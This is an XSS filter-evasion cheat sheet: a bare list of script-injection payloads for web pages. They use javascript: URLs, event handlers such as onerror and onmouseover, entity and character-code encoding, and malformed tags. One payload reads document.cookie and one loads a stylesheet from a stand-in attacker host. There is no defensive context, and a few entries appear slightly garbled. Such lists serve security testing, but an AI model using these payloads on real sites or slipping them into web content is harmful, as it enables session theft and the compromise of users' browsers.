XSS Filter Evasion

The list-style-image propery

<style> li {list-style-image: url("javascript:confirm(1)");}

Low source

<img lowsrc="javascript:confirm(1)">

Using the transition event

<style>:target {color: red;}</style>
<div id=x style="transition: color 1s" ontransitionstart=confirm(1)></div>

HTML entities

<img src=javascript:confirm(&quot;xss&quot;) />

Grave accent obfuscation

<img src=`javascript:confirm(1)`>

Malformed anchor tag

\<a onmouseover="confirm(document.cookie)"\>click\</a\>

Malformed IMG tags

<img """><script>confirm(1)</script"\>

Using the fromCharCode() method

<img src=javascript:confirm(String.fromCharCode(88,83,83))>

Exploiting the bgsound tag

<bgsound src="javascript:confirm(1);">

Remote style sheet

<link rel="stylesheet" href="http://attacker.com/xss.css" />

Inside the meta tag content

<meta http-equiv="refresh" content="0;url=javascript:confirm(1);">

iFrame source

<iframe src="javascript:confirm(1);"></iframe>

Style attribute

<div style="background-image: url(javascript:confirm(1))"></div>

Embedded newline

<img src="jav&#x0AA;ascript:confirm(1)" />

Embedded tab

<img src="jav   ascript:confirm(1)" />

Default source attribute

<img src=# onmouseover="confirm(1)" />
<img src= onmouseover="confirm(1)" />

On error alert

<img src=/ onerror="confirm(1)" />

Decimal HTML character references

<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Body tag

<body onload=confirm(1)>

Image dynsrc attribute

<img dynsrc="javascript:confirm(1)">

Input of type image

<input type="image" src="javascript:confirm(1)">

Half open HTML/Javascript

<img src="`<javascript:confirm`>(1)"

Extraneous open brackets

<<script> confirm(1) //\<</script>